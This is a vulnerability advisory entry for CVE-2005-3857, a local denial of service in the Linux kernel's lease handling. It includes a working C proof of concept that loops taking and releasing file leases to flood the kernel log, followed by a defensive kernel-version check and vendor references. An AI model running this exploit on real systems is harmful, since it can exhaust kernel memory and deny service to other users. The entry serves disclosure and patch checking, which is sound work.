Linux Kernel Time_Out_Leases PrintK Local Denial of Service Vulnerability

Vulnerability ID: 1109350
Vulnerability type: Resource management error
Published: 2005-11-29
Updated: 2007-01-09
CVE: CVE-2005-3857
CNNVD-ID: CNNVD-200511-432
Platform: Linux
CVSS score: 4.9
|Vulnerability sources
https://www.exploit-db.com/exploits/26648
https://www.securityfocus.com/bid/15627
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200511-432
|Vulnerability details
The Linux kernel is the kernel used by Linux, the open-source operating system released by the Linux Foundation (USA); the NFSv4 implementation within it is a distributed file system protocol. In the time_out_leases function in locks.c of Linux kernel versions before 2.6.15-rc3, a local user can cause a denial of service (consumption of kernel log messages) by producing a large number of broken (incomplete) leases, each of which is logged with the printk function.
|Vulnerability EXP
/*
source: http://www.securityfocus.com/bid/15627/info

Linux kernel is susceptible to a local denial-of-service vulnerability.

Local attackers may trigger this issue by obtaining numerous file-lock leases, which will consume excessive kernel log memory. Once the leases time out, the event will be logged, and kernel memory will be consumed.

This issue allows local attackers to consume excessive kernel memory, eventually leading to an out-of-memory condition and a denial of service for legitimate users.

Kernel versions prior to 2.6.15-rc3 are vulnerable to this issue.
*/

#define _GNU_SOURCE        /* F_SETLEASE is a Linux-specific fcntl command */
#include <stdio.h>         /* perror */
#include <stdlib.h>        /* exit */
#include <unistd.h>
#include <fcntl.h>         /* open, fcntl, F_SETLEASE, F_RDLCK, F_UNLCK */

int main(int ac, char **av)
{
    /* The PoC takes leases on its own executable (av[0]); any file the
       caller can open read-only and owns would serve the same purpose. */
    char *fname = av[0];
    int fd = open(fname, O_RDONLY);
    int r;

    (void)ac;
    if (fd == -1) {
        perror("open");
        exit(1);
    }

    /* Take and release a read lease without pause. On affected kernels
       every lease that is broken is reported through printk in
       time_out_leases, so the loop keeps the kernel log growing. */
    while (1) {
        r = fcntl(fd, F_SETLEASE, F_RDLCK);
        if (r == -1) {
            perror("F_SETLEASE, F_RDLCK");
            exit(1);
        }
        r = fcntl(fd, F_SETLEASE, F_UNLCK);
        if (r == -1) {
            perror("F_SETLEASE, F_UNLCK");
            exit(1);
        }
    }
    return 0;
}
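A host-side check a defender can run, added here as an example that is not part of the advisory or of the exploit above: it parses the running kernel's release string and compares it with the 2.6.15-rc3 boundary the advisory states, treating a final release as newer than any -rc of the same number. The parsing rules and the names parse_release and kernel_is_affected are this example's own assumptions. A positive result only means the version string predates the upstream fix; the distributions in the reference list (Red Hat, Ubuntu, Fedora, Trustix) issued their own errata and may carry the fix under an older version number, so vendor errata remain the authoritative check.

```c
/* Added example: compare a kernel release string against the fix version
   named in the advisory (2.6.15-rc3). Not kernel code, not the PoC. */
#define _GNU_SOURCE
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/utsname.h>

/* Release string broken into the fields the comparison needs.
   rc == 0 means a final release, which sorts after every -rcN. */
struct krel {
    int major, minor, patch, rc;
};

/* Parse strings such as "2.6.14.5", "2.6.15-rc2", "2.6.15" or
   "3.10.0-1160.el7.x86_64". Anything after the third numeric field other
   than "-rcN" is ignored (sub-patch levels and distro suffixes do not move
   a kernel across the 2.6.15-rc3 boundary). Returns 0 on success, -1 if the
   string does not start with at least "major.minor". */
static int parse_release(const char *s, struct krel *out)
{
    int fields[3] = {0, 0, 0};
    int i;

    memset(out, 0, sizeof *out);
    for (i = 0; i < 3; i++) {
        char *end;
        if (*s < '0' || *s > '9') {
            if (i < 2)
                return -1;          /* need at least major.minor */
            break;
        }
        fields[i] = (int)strtol(s, &end, 10);
        s = end;
        if (*s != '.')
            break;                  /* "-rc3", "-1160.el7" or end of string */
        s++;
    }
    out->major = fields[0];
    out->minor = fields[1];
    out->patch = fields[2];
    if (strncmp(s, "-rc", 3) == 0)
        out->rc = (int)strtol(s + 3, NULL, 10);
    return 0;
}

/* 1 = release sorts before 2.6.15-rc3 (the fix version in the advisory),
   0 = at or after it, -1 = release string not understood. */
int kernel_is_affected(const char *release)
{
    struct krel k;
    int fixed[4] = {2, 6, 15, 3};       /* 2.6.15-rc3 */
    int cur[4];
    int i;

    if (parse_release(release, &k) != 0)
        return -1;
    cur[0] = k.major;
    cur[1] = k.minor;
    cur[2] = k.patch;
    cur[3] = k.rc ? k.rc : INT_MAX;     /* a final release beats any rc */
    for (i = 0; i < 4; i++) {
        if (cur[i] < fixed[i])
            return 1;
        if (cur[i] > fixed[i])
            return 0;
    }
    return 0;                           /* exactly 2.6.15-rc3 carries the fix */
}

int main(void)
{
    struct utsname u;
    int r;

    if (uname(&u) != 0) {
        perror("uname");
        return 2;
    }
    r = kernel_is_affected(u.release);
    printf("running kernel %s: %s\n", u.release,
           r == 1 ? "predates the 2.6.15-rc3 fix for CVE-2005-3857; consult vendor errata for a backport"
         : r == 0 ? "at or after 2.6.15-rc3"
                  : "release string not understood");
    return r == 1 ? 1 : 0;
}
```

Exit status 1 flags a pre-fix version string, which makes the program usable from an inventory script; the rc handling matters because 2.6.15-rc2 is affected while 2.6.15 final and 2.6.15-rc3 itself are not.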
|Affected products
Ubuntu Ubuntu Linux 5.10 powerpc; Ubuntu Ubuntu Linux 5.10 i386; Ubuntu Ubuntu Linux 5.10 amd64; Ubuntu Ubuntu Linux 5.0 4 powerpc; Ubuntu Ubuntu Linux 5.0 4 i386; Ubuntu Ubuntu
|References

Source: MISC
Link: https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=174337
Source: UBUNTU
Name: USN-231-1
Link: http://www.ubuntulinux.org/support/documentation/usn/usn-231-1
Source: TRUSTIX
Name: TSLSA-2005-0070
Link: http://www.trustix.org/errata/2005/0070
Source: BID
Name: 15627
Link: http://www.securityfocus.com/bid/15627
Source: FEDORA
Name: FLSA:157459-2
Link: http://www.securityfocus.com/archive/1/archive/1/428058/100/0/threaded
Source: FEDORA
Name: FLSA:157459-1
Link: http://www.securityfocus.com/archive/1/archive/1/428028/100/0/threaded
Source: FEDORA
Name: FLSA:157459-4
Link: http://www.securityfocus.com/archive/1/archive/1/427981/100/0/threaded
Source: REDHAT
Name: RHSA-2006:0140
Link: http://www.redhat.com/support/errata/RHSA-2006-0140.html
Source: REDHAT
Name: RHSA-2006:0101
Link: http://www.redhat.com/support/errata/RHSA-2006-0101.html
Source: www.kernel.org
Link: http://www.kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=7ed0175a462c4c30f6df6fac1cccac058f997739
Source: VUPEN
Name: ADV-2005-2649
Link: http://www.frsirt.com/english/advisories/2005/2649
Source: DEBI